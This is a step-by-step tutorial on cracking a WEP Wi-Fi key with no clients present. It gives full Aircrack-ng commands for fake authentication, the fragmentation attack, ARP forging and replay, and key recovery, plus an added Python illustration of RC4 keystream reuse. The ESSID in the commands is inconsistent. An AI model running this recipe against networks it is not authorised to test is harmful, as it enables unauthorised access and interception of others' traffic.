WEP – How to crack WEP without clients

Before explaining how to crack WEP without clients, I assume you have a network card from this list and the injection drivers installed (Kali is fully patched). If you have doubts, check our tutorial – How to install Packet Injection Drivers on Linux!

Once the drivers are installed we must test that everything is OK and that we are close enough to the Access Point (AP) to transmit packets to it. Follow this tutorial – How to test packet injection!

Read: What to do before attacking a Wifi Network

Scenario

Hardware

  • 1 Access Point
  • 1 Laptop
  • 1 Alfa Card
  • 2 Neurons

Software

All tools in this tutorial come from the Aircrack-ng framework:

  • Airmon-ng
  • Airodump-ng
  • packetforge-ng
  • Aircrack-ng

Network Details

ESSID: WifiSec

BSSID:

Channel: 7

Monitor Interface: mon0

MAC Wifi card:

How does it work?

Cracking WEP is easy, but we have to keep in mind the real-world requirements and limitations we have to deal with. In this tutorial I will explain how to crack WEP without clients using the fragmentation, fake authentication and ARP request replay attacks. For the curious, I recommend reading these two tutorials first – Conditions to crack a Wifi password, How WEP Works and WEP Attacks.

Let’s start with the theory. First we put our network card into monitor mode to sniff packets from the air. Then we fake an authentication with the AP so that we can obtain the PRGA keystream by applying the fragmentation attack. With the PRGA keystream in hand we forge an ARP packet and inject it, which makes the AP generate traffic with fresh IVs. We collect those unique IVs, and once enough packets are captured we run the cracker over them to recover the key.
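To make the theory concrete, here is an added example (not from the original tutorial) that models WEP's per-packet keying with a minimal RC4 implementation. It shows the two facts the steps below rely on: the IV is only 24 bits, so repeats are unavoidable, and any repeated IV reuses an RC4 keystream, so XORing two ciphertexts cancels the keystream entirely. The 40-bit key, IVs and ARP payloads are constructed values.

```python
import math

# Added illustration of WEP's keystream-reuse weakness; key/IVs are constructed.
IV_SPACE = 2 ** 24  # WEP IV is 3 bytes and is sent in the clear with every frame


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Plain RC4: key-scheduling (KSA) then `length` bytes of PRGA output."""
    S = list(range(256))
    j = 0
    for i in range(256):  # KSA
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):  # PRGA
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def wep_keystream(iv: bytes, wep_key: bytes, length: int) -> bytes:
    """WEP's per-packet RC4 key is simply IV (3 bytes) || shared secret key."""
    assert len(iv) == 3, "WEP IV must be exactly 24 bits"
    return rc4_keystream(iv + wep_key, length)


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(iv: bytes, wep_key: bytes, plaintext: bytes) -> bytes:
    return xor_bytes(plaintext, wep_keystream(iv, wep_key, len(plaintext)))


def keystream_reuse_demo(wep_key: bytes = bytes.fromhex("1234567890")) -> bool:
    """Two frames under the same IV: c1 XOR c2 == p1 XOR p2 (keystream cancels)."""
    iv = b"\x01\x02\x03"  # constructed IV reused by both frames
    p1 = b"ARP who-has 10.0.0.1"  # constructed payloads
    p2 = b"ARP who-has 10.0.0.2"
    c1 = wep_encrypt(iv, wep_key, p1)
    c2 = wep_encrypt(iv, wep_key, p2)
    return xor_bytes(c1, c2) == xor_bytes(p1, p2)


def ivs_until_repeat_likely(p: float = 0.5) -> int:
    """Birthday bound: frames after which an IV repeat has probability ~p."""
    return int(math.sqrt(2 * IV_SPACE * math.log(1 / (1 - p))))
```

With a 50% repeat after only a few thousand frames, a busy AP reuses keystreams within minutes, which is why counting unique IVs is the progress metric during capture.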

Limitations

  • Proximity to the AP
  • AP filters client MAC addresses
  • AP isn’t generating data packets
  • If the fragmentation attack fails, use the Chopchop attack
  • or interactive frame selection

Let’s Work

Put the interface into monitor mode on channel 7:

airmon-ng start wlan0 7

1 – Fake authentication attack

aireplay-ng -1 0 -e Wifisec.info -a 9C:97:26:D7:94:71 -h 00:C0:4C:6B:FF:76 mon0

Keep the connection to the AP alive

aireplay-ng -1 6000 -o 1 -q 10 -e Wifisec -a 9C:97:26:D7:94:71 -h 00:C0:4C:6B:FF:76 mon0

Fragmentation attack to recover the PRGA keystream (written to a .xor file)

aireplay-ng -5 -b 9C:97:26:D7:94:71 -h 00:C0:4C:6B:FF:76 mon0

Forge an ARP request with the recovered PRGA keystream

packetforge-ng -0 -a 9C:97:26:D7:94:71 -h 00:C0:4C:6B:FF:76 -k 255.255.255.255 -l 255.255.255.255 -y *.xor -w arp-request

Start capturing the data to a file (channel 7, as set above)

airodump-ng -c 7 --bssid 9C:97:26:D7:94:71 -w capturedata mon0

Replay the forged ARP request to make the AP generate new IVs

aireplay-ng -2 -r arp-request mon0

Crack the key from the captured IVs

aircrack-ng -b 9C:97:26:D7:94:71 capture*.cap
